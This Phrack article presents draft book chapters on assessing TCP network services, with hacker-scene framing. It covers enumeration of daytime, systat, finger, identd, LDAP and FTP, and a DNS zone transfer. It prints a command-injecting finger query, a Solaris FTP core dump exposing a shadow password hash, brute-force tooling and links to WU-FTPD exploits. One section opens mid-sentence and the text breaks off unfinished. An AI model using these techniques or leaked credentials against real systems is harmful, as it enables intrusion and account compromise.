==Phrack Inc.==
Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x0f
|=---------------------------=[ How to Hack ]=--------------------------=|
|=----------------------------------------------------------------------=|
|=------------------------------=[ so1o ]=------------------------------=|
1 - Introduction
2 - How Its Done
2.1 - Chapter 5, Assessing TCP Network Services
2.2 - Chapter 6, Assessing UDP Network Services
3 - Assorted IRC Logs - A Journey into My Psyche
--[ 1. Introduction
Friends! Confidence remains high in the hacking community as we enter
2004... despite what everybody says, the hacking scene is NOT dead!
As a token of my love, to all those people who supported my hacking
career by giving me warez and rootshells, to help me become the world's
foremost expert on ethical computer hacking that I am today, I would
like to offer this small token of my appreciation.
As many of you SHOULD know, I am publishing a book on attack and
penetration testing with O'reilly. Since my motto has always been
"Information needs to be freed!" I am offering you, free of charge,
and ready for immediate reading, 2 draft-cut chapters of my book.
Other infosec experts like Ryan Russell and Mike Schiffman "expose"
their hacking secrets to anybody with $45, but I'd like to send this
one out to the underground, on the house. I've chosen to include the
chapters as a standard ASCII text file, as opposed to a pdf or html,
so you can copy sections and paste them into the motd's of boxes
you have owned, so the administrators can figure out how they were
hacked and how to patch themselves.
--[ 2. How Its Done
----[ 2.1 Chapter 5, Assessing TCP Network Services
Assessing TCP Network Services
This chapter focuses on the technical execution of TCP network service
assessment. Common services (including FTP, SMTP, HTTP & POP3) are
accessible as plaintext network services, and so can be assessed easily
using simple scripts or even a telnet client. Services that use non-
plaintext proprietary protocols (including NetBIOS, SQL & LDAP) must
however be assessed using more complex scripts or auditing tools, which are
comprehensively covered in this chapter. Instead of comprehensively listing
each and every TCP network service in order of port number, you will find
that services have been grouped by their role (which will also help
highlight common vulnerabilities found in different types of TCP services).
The roles that TCP services have been grouped by are as follows:
Internal Services
Remote Information Services
Remote Maintenance Services
Microsoft Windows Networking Services
VPN & Remote Network Access Services
Network Proxy Services
E-Mail & News Services
Web Services
Database Services
Unix RPC Services
Print Services
Internal Services
A variety of operating systems including Cisco IOS, Windows 2000 and Linux
are often found to be running internal services. Such internal services are
historically used for network diagnostic and connectivity checking
purposes, and rarely have useful application in modern network
environments.
Internal TCP services are commonly defined within Unix and Windows services
files as the following (it should be noted that many of these services also
listen on UDP ports):
tcpmux 1/tcp
echo 7/tcp
discard 9/tcp
daytime 13/tcp
qotd 17/tcp
chargen 19/tcp
time 37/tcp
The echo, discard, qotd and chargen services provide little insight into
system configuration, and to date no direct system access can be gained
through these services. A denial of service attack can however be launched
if both echo and chargen are running.
Echo and Chargen Denial of Service
If host IP sequence numbers are easily predicted, a spoofed TCP session
can be initiated to confuse the target system into connecting to itself
from port 7 (echo) to port 19 (chargen) over TCP or UDP. The chargen
service generates a continuous stream of ASCII characters and sends them
to the echo service, causing them to be processed and echoed back.
Performance of devices with limited processing resources (such as entry-
level routers) can be degraded heavily with this type of attack. Denial
of Service tools such as fraggle target these internal services.
The TCP multiplexer service (tcpmux, running on TCP port 1) is common to
IRIX system platforms. The tcpmux service itself contains no known
vulnerabilities, but is an indicator of the hosts operating platform. The
service behaves much like an RPC portmapper, allowing for services to run
on arbitrary ports (described in RFC 1078).
The daytime and time services (running on TCP ports 13 and 37 respectively)
can be queried to deduce the time zone of the target system and its
approximate location, as shown in figure 22 below.
Figure 22: Using telnet to connect to the daytime service
# telnet 192.168.0.1 13
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Sat Jan 4 08:16:57 2003
Connection closed by foreign host.
Remote Information Services
Unix-based systems (including Linux, Solaris, FreeBSD and other variants)
and platforms such as Cisco IOS can be found to be running remote
information services that provide system, user and network details over
TCP/IP. Such services can be probed to collate username listings and
details of trusted networks and hosts, and in some cases compromise systems
directly.
A simple list of remote information services has been taken from the
services file:
systat 11/tcp
netstat 15/tcp
domain 53/tcp
finger 79/tcp
auth 113/tcp
ldap 389/tcp
Systat and Netstat
The systat and netstat services in particular are of interest, as current
network and system information can be easily gleaned through connecting to
the services using telnet. If we take a look at a Unix /etc/inetd.conf file
from a system running systat and netstat, we find:
systat stream tcp nowait root /usr/bin/ps ps
-ef
netstat stream tcp nowait root /usr/bin/netstat netstat
-a
Effectively, the ps -ef and netstat -a commands are bound to TCP ports 11
and 15 respectively. Figures 23 and 24 show live results accessed through
these services.
Figure 23: Linux system information gleaned through systat
# telnet 192.168.0.1 11
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan03 ? 00:00:05 init [2]
root 2 1 0 Jan03 ? 00:00:00 [keventd]
root 3 1 0 Jan03 ? 00:00:00
[ksoftirqd_CPU0]
root 4 1 0 Jan03 ? 00:00:00 [kswapd]
root 5 1 0 Jan03 ? 00:00:00 [bdflush]
root 6 1 0 Jan03 ? 00:00:00 [kupdated]
root 10 1 0 Jan03 ? 00:00:00 [khubd]
root 492 1 0 Jan03 ? 00:00:00 /sbin/syslogd
root 495 1 0 Jan03 ? 00:00:00 /sbin/klogd
root 503 1 0 Jan03 ? 00:00:00
/usr/sbin/dhcpd -q
root 512 1 0 Jan03 ? 00:00:00
/usr/sbin/inetd
root 520 1 0 Jan03 ? 00:00:00 /usr/sbin/sshd
daemon 523 1 0 Jan03 ? 00:00:00 /usr/sbin/atd
root 526 1 0 Jan03 ? 00:00:00 /usr/sbin/cron
root 531 1 0 Jan03 tty1 00:00:00 -bash
root 532 1 0 Jan03 tty2 00:00:00 /sbin/getty
38400 tty2
root 533 1 0 Jan03 tty3 00:00:00 /sbin/getty
38400 tty3
root 534 1 0 Jan03 tty4 00:00:00 /sbin/getty
38400 tty4
root 535 1 0 Jan03 tty5 00:00:00 /sbin/getty
38400 tty5
root 536 1 0 Jan03 tty6 00:00:00 /sbin/getty
38400 tty6
root 887 1 0 Jan03 ? 00:00:03
/usr/sbin/named
root 913 1 0 Jan03 ? 00:00:00 [eth0]
root 918 1 0 Jan03 ? 00:00:00 [eth1]
root 1985 520 0 08:05 ? 00:00:00 /usr/sbin/sshd
root 1987 1985 0 08:05 pts/0 00:00:00 -bash
root 2066 1987 0 10:44 pts/0 00:00:00 ps -ef
Figure 24: Linux system information gleaned through netstat
# telnet 192.168.0.1 15
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State
tcp 0 0 *:time *:*
LISTEN
tcp 0 0 *:discard *:*
LISTEN
tcp 0 0 *:daytime *:*
LISTEN
tcp 0 0 no-dns-yet.demon:domain *:*
LISTEN
tcp 0 0 192.168.0.1:domain *:*
LISTEN
tcp 0 0 mail:domain *:*
LISTEN
tcp 0 0 *:ssh *:*
LISTEN
tcp 0 0 *:smtp *:*
LISTEN
tcp 0 52 no-dns-yet.demon.co:ssh pc-62-20-40-1-
az.b:3526 ESTABLISHED
udp 0 0 *:32769 *:*
udp 0 0 *:discard *:*
udp 0 0 no-dns-yet.demon:domain *:*
udp 0 0 192.168.0.1:domain *:*
udp 0 0 mail:domain *:*
udp 0 0 *:bootps *:*
raw 0 0 *:icmp *:*
7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 5 [ ] DGRAM 456
/dev/log
unix 2 [ ACC ] STREAM LISTENING 1125
/var/run/ndc
unix 2 [ ] DGRAM 1123
unix 2 [ ] DGRAM 516
unix 2 [ ] DGRAM 489
This detailed system information gives insight into the following areas of
the target environment:
Processes running on the target host
2. User names of process owners that can be later used to undertake brute
force password guessing attacks to gain access to network components
3. Sensitive details within process strings (such as a SQL query run from
the command line containing both the SQL server IP address and
password details)
Details of current network connections to internal and trusted hosts
DNS
The Domain Name System is primarily used across UDP and so assessment
techniques are comprehensively covered in Chapter 6. Most DNS servers do
also listen on TCP port 53 for DNS zone transfer purposes when secondary
name servers request the latest DNS zone file from the primary name server.
As discussed earlier in Chapter 3, a DNS zone file contains all of the
naming information that the name server stores regarding a specific DNS
domain. A DNS zone transfer can often be launched to retrieve details of
non-public internal networks and other useful information that can be used
to build an accurate map of the target infrastructure.
It is strongly recommended, for reasons of load balancing and fault
tolerance, that organizations use more than one name server. The main name
server is known as the primary name server, and all subsequent name servers
are secondary name servers. Either a primary or secondary name server can
be queried for name resolution, so it is necessary that the DNS information
residing on each name server is current. To ensure this is the case, when a
secondary name server is started and at regular, specifiable intervals
thereafter, it requests a complete listing of the computers it is
responsible for from the primary name server. The process of requesting and
receiving this information is a zone transfer.
Windows tools such as nslookup and the Sam Spade Windows client (available
from www.samspade.org) can be used to perform a DNS zone transfer (as
detailed earlier in Chapter 3), but the most effective method is to issue a
DNS zone transfer request against a specific DNS server is to use the Unix
dig command:
# dig @auth100.ns.uu.net ucia.gov axfr
; <<>> DiG 9.2.1 <<>> @auth100.ns.uu.net ucia.gov axfr
;; global options: printcmd
ucia.gov. 86400 IN SOA ain-
relay1.net.cia.gov.ucia.gov.
root.puff.ucia.gov. 301033806 7200 3600 604800 86400
ucia.gov. 86400 IN NS
relay1.ucia.gov.
ucia.gov. 86400 IN NS
auth100.ns.uu.net.
ucia.gov. 86400 IN MX 5
relay2.ucia.gov.
relay2-qfe0.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-qfe0.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ain-relay1-ext.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ex-rtr-191-a.ucia.gov. 86400 IN A 192.103.66.58
ain-relay11-ext.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
ex-rtr-191-b.ucia.gov. 86400 IN A 192.103.66.62
relay.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay2-int.ucia.gov. 86400 IN CNAME ain-relay2-
le1.ucia.gov.
ain-relay11-qfe0.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay11-int.ucia.gov. 86400 IN A 192.168.64.4
ain.ucia.gov. 86400 IN A 198.81.128.68
foia.ucia.gov. 86400 IN CNAME
www.foia.ucia.gov.
relay11.ucia.gov. 86400 IN A 198.81.129.195
ain-relay2-ext.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-ext.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay11-qfe0.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay2t.ucia.gov. 86400 IN A 198.81.129.34
ain-relay2-qfe1.ucia.gov. 86400 IN A 192.168.64.3
ain-relay1-qfe0.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ain-relay1-qfe1.ucia.gov. 86400 IN A 192.168.64.2
ex-rtr.ucia.gov. 86400 IN CNAME ex-rtr-
129.ucia.gov.
wais.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay2-ext.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
ain-relay1-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ain-relay.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay11-ext.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay1.ucia.gov. 86400 IN A 198.81.129.193
relay2.ucia.gov. 86400 IN A 198.81.129.194
ain-relay-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
relay-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ex-rtr-129.ucia.gov. 86400 IN HINFO "Cisco 4000
Router" "NP-1E Board
"
ex-rtr-129.ucia.gov. 86400 IN A 198.81.129.222
ain-relay2-int.ucia.gov. 86400 IN CNAME ain-relay2-
le1.ucia.gov.
ain-relay2-le0.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ucia.gov. 86400 IN SOA ain-
relay1.net.cia.gov.ucia.gov.
root.puff.ucia.gov. 301033806 7200 3600 604800 86400
;; Query time: 169 msec
;; SERVER: 198.6.1.202#53(auth100.ns.uu.net)
;; XFR size: 41 records
Finger
The finger service is commonly found listening on TCP port 79 of devices
such as Cisco routers and managed switches. Default out-the-box builds of
many commercial Unix-based systems run the service (including Solaris and
BSDI).
The finger service can be queried using either the finger client (found in
most operating platforms) or by directly using telnet and connecting to
port 79. Figures 25 and 26 follow, showing the difference in results from
fingering a Cisco IOS device and a Solaris server.
Figure 25: A finger query against a Cisco router using telnet
# telnet 192.168.0.1 79
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Line User Host(s) Idle Location
* 1 vty 0 idle 00:00:00
192.168.0.252
Se0 Sync PPP 00:00:00
Connection closed by foreign host.
Figure 26: Using the finger client to query a Solaris server
# finger @192.168.0.10
[192.168.0.10]
Login Name TTY Idle When
Where
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
A null query will result in the current users being shown under most finger
services. From analyzing the format of the response, we can easily
differentiate a Cisco finger service from that running on a Solaris host.
Finger Information Leak Bugs
Various information leak vulnerabilities exist in finger implementations,
of which a popular attack involves a '1 2 3 4 5 6 7 8 9 0' request against
a Solaris host running fingerd. This following bug shown in figure 27 is
present in all Solaris releases up to 8:
Figure 27: Using a malformed finger request to glean user details
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
[192.168.0.10]
Login Name TTY Idle When
Where
root Super-User console <Jun 3 17:22> :0
admin Super-User console <Jun 3 17:22> :0
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
adm Admin < . . . . >
lp Line Printer Admin < . . . . >
uucp uucp Admin < . . . . >
nuucp uucp Admin < . . . . >
listen Network Admin < . . . . >
nobody Nobody < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x Nobody < . . . . >
informix Informix User < . . . . >
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
Many Unix-based finger services perform a simple cross-reference operation
of the query string against user information fields in the /etc/passwd
file, and so the following finger query strings can be used to glean useful
information:
finger .@target.host
finger 0@target.host
finger **@target.host
finger user@target.host
Finger Redirection
In some cases, servers running finger will exist on multiple networks (such
as the Internet and an internal network space). With knowledge of internal
IP ranges and host names, it is often possible to perform a finger bounce
attack to glean internal user names and host details as shown in figure 28
below.
Figure 28: Using finger to redirect a request to an internal host
# finger @192.168.0.10@217.34.317.200
[217.34.217.200]
[192.168.0.10]
Login Name TTY Idle When
Where
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
Directly Exploitable Finger Bugs
Poorly written finger implementations will allow attackers to pipe commands
through finger which are in turn run on the target host by the owner of the
service process (such as root or bin under Unix-based systems). Figure 29
below shows an example of a vulnerable finger service running on a
vulnerable DG-UX platform.
Figure 29: Issuing id and netstat commands through finger
# finger "|/bin/id@192.168.0.135"
[192.168.0.135]
uid=0(root) gid=0(root)
# finger "|/bin/netstat@192.168.0.135"
[192.168.0.135]
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address
State
tcp 0 0 localhost.localdo:45233
localhost.localdo:45232 ESTABLISHED
tcp 0 0 localhost.localdo:45232
localhost.localdo:45233 ESTABLISHED
tcp 0 0 localhost.localdo:45235
localhost.localdo:45234 ESTABLISHED
tcp 0 0 localhost.localdo:45234
localhost.localdo:45235 ESTABLISHED
tcp 0 0 localhost.localdo:45237
localhost.localdo:45236 ESTABLISHED
tcp 0 0 localhost.localdo:45236
localhost.localdo:45237 ESTABLISHED
tcp 0 11433 mdma.lab.org:http
62.167.163.193:3414 ESTABLISHED
tcp 0 0 localhost.localdo:45229
localhost.localdo:45228 ESTABLISHED
tcp 0 0 localhost.localdo:45228
localhost.localdo:45229 ESTABLISHED
tcp 0 0 localhost.localdo:45231
localhost.localdo:45230 ESTABLISHED
tcp 0 0 localhost.localdo:45230
localhost.localdo:45231 ESTABLISHED
tcp 0 0 el8.net:ssh
195.188.198.198:38930 ESTABLISHED
tcp 0 0 el8.net:34785
209.126.200.130:ircd ESTABLISHED
Serious buffer overflow vulnerabilities exist in many Linux fingerd
packages, including cfingerd. At the time of writing, cfingerd 1.4.3 and
prior running on Linux (packaged with Debian and Red Hat in particular) is
especially susceptible to a plethora of remote and locally exploitable
bugs. For current details of publicly available fingerd exploits, you can
search Packet Storm's archives for 'finger exploit'.
Auth
The Unix auth service (also known as identd) listens on TCP port 113. The
primary purpose of auth is to provide a degree of authentication through
mapping local user names to TCP network ports being used. IRC (Internet
Relay Chat) is a good example of this, as when a user connects to an IRC
server, an auth request is sent to TCP port 113 of the host to retrieve the
user's current login name.
The auth service can be queried in-line with RFC 1413 to match open TCP
ports on the target host with local usernames. This username information
has two different uses to an attacker:
To derive the owners of processes with open ports
If for example, a vulnerable version of BIND is found to be running on a
target server and TCP port 113 is also open, an identd cross-referenced
port scan will reveal the user running the BIND process on the server. If
the process is owned by named (as opposed to root), then the BIND process
may exist in a chroot jail and be difficult to compromise.
To enumerate and list valid usernames
From enumerating valid user login details, an attacker can seek to launch
brute force attacks and take advantage of weak password policies.
Nmap has the capability to cross-reference open ports with identd. Figure
30 below shows such an identd scan being run to identify a handful of
active user accounts.
Figure 30: Nmap being used to perform identd cross-referencing
# nmap -I -sS 192.168.0.10
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on dockmaster (192.168.0.10):
(The 1595 ports scanned but not shown below are in state:
closed)
Port State Service Owner
22/tcp open ssh root
25/tcp open smtp root
80/tcp open http nobody
110/tcp open pop-3 root
113/tcp open auth ident
8080/tcp open http-proxy nobody
The Linux jidentd and cidentd packages contain various buffer overflow
vulnerabilities. It is highly recommended that research is undertaken when
assessing servers found to have identd running, including enumeration of
the operating platform to ascertain the probable type of identd service
running.
Rusers
The Unix rusersd service is an RPC (Remote Procedure Call) service that
listens on a dynamic TCP port. The rusers client utility first connects to
the RPC portmapper on TCP port 111, which returns the whereabouts of the
rusers service if it is indeed active.
If during initial TCP port scans, the RPC portmapper service is not found
to be accessible on TCP port 111, it is highly unlikely that rusersd will
be running. However if TCP port 111 is found to be accessible, the rpcinfo
client can be used to check for the presence of rusersd and other
accessible RPC services as detailed below in figure 31.
Figure 31: Using rpcinfo to retrieve details of active RPC services
# rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
From finding that rusersd is indeed running, we can probe the service with
the rusers client from any Unix-based platform to retrieve a list of users
who are logged into the system:
# rusers -l 192.168.0.50
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
jah onyx:console Mar 3 13:03 22:03
amber onyx:ttyp1 Mar 2 07:40
sebree onyx:ttyp5 Mar 2 10:35 14
tut onyx:ttyp6 Mar 2 10:48
LDAP
The Lightweight Directory Access Protocol (LDAP) service is commonly found
on Windows 2000 Active Directory, Exchange and Lotus Domino servers. The
system is used to provide user directory information to clients. LDAP is
highly extensible and widely supported by Apache, MS Exchange, Outlook,
Netscape Communicator and others.
LDAP can be queried anonymously (mileage depending on the server
configuration) using the ldp.exe utility from the Microsoft Windows 2000
Support Tools Kit (found on the Windows 2000 Server installation CD under
the /support/tools/ directory). Figure 32 below shows ldp.exe being run
against a Windows 2000 server running Lotus Domino.
Figure 32: Enumerating information anonymously via LDAP
[pic]
A very simple Unix-based alternative to ldp.exe is the ldapsearch tool that
is bundled with OpenLDAP (www.openldap.org), shown performing the same
anonymous LDAP search against 192.168.0.65 (a Lotus Domino server on
Windows 2000):
# ldapsearch -h 192.168.0.65
< non-relevant results removed for aesthetic purposes >
# Nick Baskett, Trustmatta
dn: CN=Nick Baskett,O=Trustmatta
mail: nick.baskett@trustmatta.com
givenname: Nick
sn: Baskett
cn: Nick Baskett, nick
uid: nick
maildomain: trustmatta
# Andrew Done, Trustmatta/2C andrew
dn: CN=Andrew Done,O=Trustmatta/, andrew
mail: andrew.done@trustmatta.com
givenname: Andrew
sn: Done
uid: andrew
maildomain: trustmatta
# James Woodcock, Trustmatta/2C james
dn: CN=James Woodcock,O=Trustmatta/, james
mail: james.woodcock@trustmatta.com
givenname: James
sn: Woodcock
uid: james
maildomain: trustmatta
# Jim Chalmers, Trustmatta/2C jim
dn: CN=Jim Chalmers,O=Trustmatta/, jim
mail: jim.chalmers@trustmatta.com
givenname: Jim
sn: Chalmers
uid: Jim
maildomain: trustmatta
Anonymous access to LDAP has limited use, however if LDAP is found running
under Windows 2000 it can be attacked by brute force with a list of valid
user names (enumerated through NetBIOS, SNMP or other techniques) to find
both users with weak system passwords, and gain access to LDAP itself.
The Unix-based bf_ldap tool can be used to effectively perform an LDAP
brute force attack, available from www.trustmatta.com/tools/bf_ldap.tar.gz.
The usage of bf_ldap is demonstrated in figure 33 as follows.
Figure 33: The bf_ldap LDAP brute force utility
# bf_ldap
Eliel Sardanons <eliel.sardanons@philips.edu.ar>
Usage:
bf_ldap <parameters> <optional>
parameters:
-s server
-d domain name
-u|-U username | users list file name
-L|-l passwords list | length of passwords to generate
optional:
-p port (default 389)
-v (verbose mode)
-P Ldap user path (default ,CN=Users,)
Remote Maintenance Services
Services used by network administrators to directly manage remote hosts
over TCP/IP include Telnet, FTP, SSH, VNC and raft of others. Remote
maintenance services are threatened by three categories of attack in
particular:
Information leak attacks, where user and system details can be gleaned
Process manipulation, including overflow attacks involving malformed data
Brute force guessing of user passwords to gain direct access
For example, an online bank may be running the telnet service on its
Internet routers for administrative purposes. This telnet service may not
be vulnerable to information leak or process manipulation attacks, but a
determined attacker will spend an amount of time undertaking a brute force
attack against the device service in order to gain access. Brute force is
seriously underestimated as an attack vector by many organizations.
Common remote maintenance services taken from the services file are as
follows:
ftp 21/tcp
ssh 22/tcp
telnet 23/tcp
exec 512/tcp
login 513/tcp
shell 514/tcp
controlit 799/tcp
x11 6000/tcp
citrix-ica 1494/tcp
ms-rdp 3389/tcp
pcanywheredata 5631/tcp
pcanywherestat 5632/tcp
vnc-http 5800/tcp
vnc 5900/tcp
pcanywhere 65301/tcp
FTP
File Transfer Protocol services are primarily found running on network
servers for file transfer purposes. The FTP service uses two TCP ports to
function correctly:
TCP port 21 (the FTP control port), used to issue FTP commands
TCP port 20 (the FTP data port), used to transfer data from the server to
clients
When finding a server running FTP, the first piece of information that will
be gleaned from connecting to the service is the FTP server banner:
# ftp 192.168.0.11
Connected to 192.168.0.11 (192.168.0.11).
220 darkside FTP server ready.
Name (192.168.0.11:root):
The banner above is that of a Solaris 9 server. Solaris 8 (SunOS 5.8) and
prior return the operating system detail in a slightly different banner:
# ftp 192.168.0.12
Connected to 192.168.0.12 (192.168.0.12).
220 lackie FTP server (SunOS 5.8) ready.
Name (192.168.0.12:root):
If the banner is obfuscated or modified to remove service version or
operating system information, the service can sometimes be identified by
analyzing responses to quote help and syst commands upon logging in
anonymously, as shown in figure 34 below.
Figure 34: Logging into and querying an FTP service
# ftp 192.168.0.250
Connected to 192.168.0.250 (192.168.0.250).
220 ftp.trustmatta.com FTP server ready.
Name (ftp.trustmatta.com:root): ftp
331 Guest login ok, send your complete e-mail address as
password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote help
214-The following commands are recognized (* =>'s
unimplemented).
USER PORT STOR MSAM* RNTO NLST MKD
CDUP
PASS PASV APPE MRSQ* ABOR SITE XMKD
XCUP
ACCT* TYPE MLFL* MRCP* DELE SYST RMD
STOU
SMNT* STRU MAIL* ALLO CWD STAT XRMD
SIZE
REIN* MODE MSND* REST XCWD HELP PWD
MDTM
QUIT RETR MSOM* RNFR LIST NOOP XPWD
214 Direct comments to ftpadmin@ftp.trustmatta.com
ftp> syst
215 UNIX Type: L8 Version: SUNOS
Common FTP Banner List
Sun Solaris 7:
220 hostname FTP server (SunOS 5.7) ready.
Sun SunOS 4.1.x:
220 hostname FTP server (SunOS 4.1) ready.
FreeBSD 3.x:
220 hostname FTP server (Version 6.00) ready.
FreeBSD 4.x:
220 hostname FTP server (Version 6.00LS) ready.
NetBSD 1.5.x:
220 hostname FTP server (NetBSD-ftpd 20010329) ready.
OpenBSD:
220 hostname FTP server (Version 6.5/OpenBSD) ready.
SGI IRIX 6.x
220 hostname FTP server ready.
IBM AIX 4.x:
220 hostname FTP server (Version 4.1 Tue Sep 8 17:35:59 CDT
1998) ready.
Compaq Tru64:
220 hostname FTP server (Digital UNIX Version 5.60) ready.
HP-UX 11.x:
220 hostname FTP server (Version 1.1.214.6 Wed Feb 9 08:03:34
GMT 2000) ready.
DEC Ultrix 4.1:
220 hostname FTP server (Version 4.1 Sun Mar 25 22:59:11 EST
1990) ready.
Apple MacOS:
220 hostname FTP server (Version 6.00) ready.
Washington University FTP (WU-FTP) 2.4.2 BETA 18:
220 hostname FTP server (Version wu-2.4.2-academ[BETA-18](1)
Mon Jan 15 15:02:27 JST 1999) ready.
Washington University FTP (WU-FTP) 2.5.0:
220 hostname FTP server (Version wu-2.5.0(1) Tue Jun 15
12:43:57 MST 1999) ready.
ProFTPD 1.2.4
220 ProFTPD 1.2.4 Server (hostname) [hostname]
WU-FTP and ProFTPD are often found running on Linux hosts, although
sometimes administrators chose to run these third party FTP services on
FreeBSD, Solaris and other Unix-based platforms.
Solaris FTP Vulnerabilities
The following glob() bug is present in out-the-box Solaris installations up
to Solaris 8. By issuing requests of CWD ~username, we can effectively
enumerate valid user accounts without even logging into the FTP server
(described in detail at www.iss.net/security_center/static/6332.php). In
this example, blah and test users do not exist, but chris does:
# telnet 192.168.0.12 21
Trying 192.168.0.12...
Connected to 192.168.0.12.
Escape character is '^]'.
220 lackie FTP server (SunOS 5.8) ready.
CWD ~blah
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~test
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~chris
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Connection closed by foreign host.
This glob() bug can be exploited within Solaris, resulting in a heap
overflow. Local users can easily abuse this bug so that the Solaris FTP
service dumps a core file containing encrypted user passwords from the
/etc/shadow file, and other sensitive information (vulnerable in Solaris 8
and below):
$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cookiemonster FTP server (SunOS 5.6) ready.
user chris
331 Password required for chris.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
$ ls -la /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
$ strings /core | grep ::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
chris:XEC/9QJZ4nSn2:12040::::::
sshd:*LK*:::::::
$
A public exploit has not yet been released to remotely compromise Solaris
hosts with this vulnerability. Theoretically, the service could be
exploited under Solaris if write access to the file system is permitted
through FTP (although this may be difficult to exploit under Solaris due to
NULL pointer issues). The glob() vulnerability has been publicly exploited
under BSD systems (including NetBSD, OpenBSD, FreeBSD), which discussed in
the following section.
BSD FTP Vulnerabilities
for which an exploit script is available from
www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.
FTP server 6.00
FTP server 6.00LS
WU-FTPD Vulnerabilities
WU-FTPD 2.4.2 BETA 18
WU-FTPD version 2.4.2 BETA 18 and prior are vulnerable to a stack overflow
due to insufficient bounds checking in the realpath() function within the
FTP service. Exploitation occurs through an attacker creating a complex
directory structure and then navigating through the structure and executing
arbitrary commands through a stack overflow.
A Unix exploit script for use against Red Hat and Slackware Linux
distributions running WU-FTPD 2.4.2 BETA 18 is archived at
www.trustmatta.com/tools/w00f.c. The CVE reference for this vulnerability
is CVE-1999-0368, and the ISS X-Force has compiled background vulnerability
information at www.iss.net/security_center/static/1728.php.
WU-FTPD 2.5.0
WU-FTPD version 2.5.0 and prior is vulnerable to remote a MAPPING_CHDIR
stack overflow, through a user with write access to the FTP server creating
a series of directories on the host, and using CWD to overflow the
mapped_path variable.
An exploit for use against Red Hat and Debian Linux distributions is
ifafoffuffoffaf by TESO, available in source form from
www.trustmatta.com/tools/ifafoffuffoffaf.c. The CVE reference for this
vulnerability is CVE-1999-0878, and the ISS X-Force has compiled background
vulnerability information at www.iss.net/security_center/static/3158.php.
WU-FTPD 2.6.0
WU-FTPD version 2.6.0 and prior is vulnerable to an lreply() and SITE EXEC
format string attack. In order for the attack to be executed, the user must
be successfully logged in either anonymously or with a valid account.
Many versions of the remote exploit can be found for FreeBSD, Red Hat and
SuSe Linux (one exploit in particular is archived at
www.trustmatta.com/tools/wuftp-god.c). The CVE reference for the
vulnerability is CVE-2000-0573, and the ISS X-Force has compiled a good
list of links and background information accessible at
www.iss.net/security_center/static/4773.php.
WU-FTPD 2.6.1
WU-FTPD version 2.6.1 and prior is vulnerable a glob() heap corruption
attack through issuing a series of RNFR and CWD ~{ commands to the FTP
service. In order for such commands to be successfully issued, the user
must be logged in either anonymously, or with a legitimate user account.
TESO released an exploit script called 7350wurm that is capable of
exploiting this vulnerability on most Linux distributions (Red Hat,
Debian, Mandrake, SuSe, Immunix and Caldera in particular), and is archived
at www.trustmatta.com/tools/7350wurm.c. The CVE reference for the
vulnerability is CVE-2001-550, and the ISS X-Force has compiled a good page
of background information about the vulnerability at
www.iss.net/security_center/static/7611.php.
Exploiting WU-FTPD on Linux with 7350wurm
One excellent trick that 7350wurm has up its sleeve is the capability to
